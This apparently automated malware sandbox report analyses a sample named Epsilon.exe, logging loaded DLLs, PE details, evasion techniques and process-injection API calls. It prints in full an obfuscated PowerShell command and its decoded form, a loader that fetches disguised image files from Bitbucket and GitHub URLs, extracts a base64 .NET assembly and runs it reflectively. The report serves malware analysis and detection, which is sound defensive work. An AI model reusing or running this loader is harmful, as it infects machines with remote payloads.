        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: Epsilon.exe | Static PE information: Image base 0x140000000 > 0x60000000
        Source: Epsilon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: Epsilon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: Epsilon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: Epsilon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Epsilon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: Epsilon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: Epsilon.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Epsilon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: wextract.pdb source: Epsilon.exe
        Source: Binary string: wextract.pdbGCTL source: Epsilon.exe
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000007.00000002.2169777517.000001A1DA5D0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 00000007.00000002.2169777517.000001A1DA5D0000.00000004.08000000.00040000.00000000.sdmp
        Source: Epsilon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: Epsilon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: Epsilon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: Epsilon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: Epsilon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $dosigo = '…'
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$H
M$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: Epsilon.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF7378230EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7378230EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D5171A pushfd ; ret 5_2_00007FF848D5172A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D500BD pushad ; iretd 5_2_00007FF848D500C1
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737821684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF737821684
        Source: C:\Users\user\Desktop\Epsilon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1960
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 695
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3167
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6631
        Source: C:\Users\user\Desktop\Epsilon.exe | Check user administrative privileges: GetTokenInformation, graph_0-2468
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708 | Thread sleep count: 3167 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712 | Thread sleep count: 6631 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 | Thread sleep time: -19369081277395017s >= -30000s
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF73782204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF73782204C
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF7378264E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF7378264E4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF7378230EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7378230EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737828790 SetUnhandledExceptionFilter,0_2_00007FF737828790
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF737828494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF737828494

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match | File source: amsi64_7660.amsi.csv, type: OTHER
        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR
        Source: 7.2.powershell.exe.1a1da5d0000.0.raw.unpack, Progrgdfam3.cs | Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 7.2.powershell.exe.1a1da5d0000.0.raw.unpack, Progrgdfam3.cs | Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
        Source: 7.2.powershell.exe.1a1da5d0000.0.raw.unpack, Progrgdfam3.cs | Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
        Source: 7.2.powershell.exe.1a1da5d0000.0.raw.unpack, Progrgdfam3.cs | Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQ